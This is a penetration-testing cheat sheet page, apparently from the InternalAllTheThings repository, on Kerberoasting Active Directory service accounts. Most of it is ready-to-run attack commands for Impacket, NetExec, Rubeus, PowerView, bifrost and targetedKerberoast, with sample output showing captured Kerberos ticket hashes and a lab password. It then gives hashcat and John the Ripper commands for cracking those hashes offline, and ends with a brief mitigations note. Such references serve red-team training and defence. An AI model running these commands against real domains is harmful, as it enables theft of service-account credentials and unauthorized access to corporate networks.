ad-roasting-kerberoasting.md (5972B)
1 --- 2 title: "Roasting - Kerberoasting" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/ad-roasting-kerberoasting.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/ad-roasting-kerberoasting.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Roasting - Kerberoasting 12 13 > "A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. " - [MSDN](https://docs.microsoft.com/fr-fr/windows/desktop/AD/service-principal-names) 14 15 Any valid domain user can request a kerberos ticket (ST) for any domain service. Once the ticket is received, password cracking can be done offline on the ticket to attempt to break the password for whatever user the service is running as. 16 17 * [SecureAuthCorp/impacket/GetUserSPNs.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetUserSPNs.py) from Impacket Suite 18 19 ```powershell 20 GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request 21 22 Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies 23 24 ServicePrincipalName Name MemberOf PasswordLastSet LastLogon 25 -------------------- ------------- -------------------------------------------------------- ------------------- ------------------- 26 active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40 2018-12-03 17:11:11 27 28 $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$424338c0a3c3af43[...]84fd2 29 ``` 30 31 * [Pennyw0rth/NetExec](https://github.com/Pennyw0rth/NetExec) 32 33 ```powershell 34 netexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --kerberoast output.txt 35 LDAP 10.0.2.11 389 dc01 [*] Windows 10.0 Build 17763 x64 (name:dc01) (domain:lab.local) (signing:True) (SMBv1:False) 36 LDAP 10.0.2.11 389 dc01 $krb5tgs$23$*john.doe$lab.local$MSSQLSvc/dc01.lab.local~1433*$efea32[...]49a5e82$b28fc61[...]f800f6dcd259ea1fca8f9 37 ``` 38 39 * [GhostPack/Rubeus](https://github.com/GhostPack/Rubeus) 40 41 ```powershell 42 # Stats 43 Rubeus.exe kerberoast /stats 44 ------------------------------------- ---------------------------------- 45 | Supported Encryption Type | Count | | Password Last Set Year | Count | 46 ------------------------------------- ---------------------------------- 47 | RC4_HMAC_DEFAULT | 1 | | 2021 | 1 | 48 ------------------------------------- ---------------------------------- 49 50 # Kerberoast (RC4 ticket) 51 Rubeus.exe kerberoast /creduser:DOMAIN\JOHN /credpassword:MyP@ssW0RD /outfile:hash.txt 52 53 # Kerberoast (AES ticket) 54 # Accounts with AES enabled in msDS-SupportedEncryptionTypes will have RC4 tickets requested. 55 Rubeus.exe kerberoast /tgtdeleg 56 57 # Kerberoast (RC4 ticket) 58 # The tgtdeleg trick is used, and accounts without AES enabled are enumerated and roasted. 59 Rubeus.exe kerberoast /rc4opsec 60 ``` 61 62 * [PowerShellMafia/PowerSploit/PowerView.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) 63 64 ```powershell 65 Request-SPNTicket -SPN "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local" 66 ``` 67 68 * [its-a-feature/bifrost](https://github.com/its-a-feature/bifrost) on **macOS** machine 69 70 ```powershell 71 ./bifrost -action asktgs -ticket doIF<...snip...>QUw= -service host/dc1-lab.lab.local -kerberoast true 72 ``` 73 74 * [ShutdownRepo/targetedKerberoast](https://github.com/ShutdownRepo/targetedKerberoast) 75 76 ```powershell 77 # for each user without SPNs, it tries to set one (abuse of a write permission on the servicePrincipalName attribute), 78 # print the "kerberoast" hash, and delete the temporary SPN set for that operation 79 targetedKerberoast.py [-h] [-v] [-q] [-D TARGET_DOMAIN] [-U USERS_FILE] [--request-user username] [-o OUTPUT_FILE] [--use-ldaps] [--only-abuse] [--no-abuse] [--dc-ip ip address] [-d DOMAIN] [-u USER] [-k] [--no-pass | -p PASSWORD | -H [LMHASH:]NTHASH | --aes-key hex key] 80 ``` 81 82 Then crack the ticket using the correct hashcat mode (`$krb5tgs$23`= `etype 23`) 83 84 | Mode | Description | 85 | ------- | ----------------------------------------------------- | 86 | `13100` | Kerberos 5 TGS-REP etype 23 (RC4) | 87 | `19600` | Kerberos 5 TGS-REP etype 17 (AES128-CTS-HMAC-SHA1-96) | 88 | `19700` | Kerberos 5 TGS-REP etype 18 (AES256-CTS-HMAC-SHA1-96) | 89 90 ```powershell 91 ./hashcat -m 13100 -a 0 kerberos_hashes.txt crackstation.txt 92 ./john --wordlist=/opt/wordlists/rockyou.txt --fork=4 --format=krb5tgs ~/kerberos_hashes.txt 93 ``` 94 95 ## Kerberoasting Without Pre-Authentication 96 97 > If an attacker knows of an account for which pre-authentication isn’t required (i.e. an ASREProastable account), as well as one (or multiple) service accounts to target, a Kerberoast attack can be attempted without having to control any Active Directory account (since pre-authentication won’t be required). 98 99 ```ps1 100 netexec ldap 10.10.10.10 -u username -p '' --no-preauth-targets users.txt --kerberoasting output.txt 101 ``` 102 103 ## Mitigations 104 105 * Have a very long password for your accounts with SPNs (> 32 characters) 106 * Make sure no users have SPNs 107 108 ## References 109 110 * [Abusing Kerberos: Kerberoasting - Haboob Team](https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf) 111 * [Invoke-Kerberoast - Powersploit Read the docs](https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/) 112 * [Kerberoasting - Part 1 - Mubix “Rob” Fuller](https://room362.com/post/2016/kerberoast-pt1/) 113 * [Post-OSCP Series Part 2 - Kerberoasting - 16 APRIL 2019 - Jon Hickman](https://0metasecurity.com/post-oscp-part-2/) 114 * [Training - Attacking and Defending Active Directory Lab - Altered Security](https://www.alteredsecurity.com/adlab)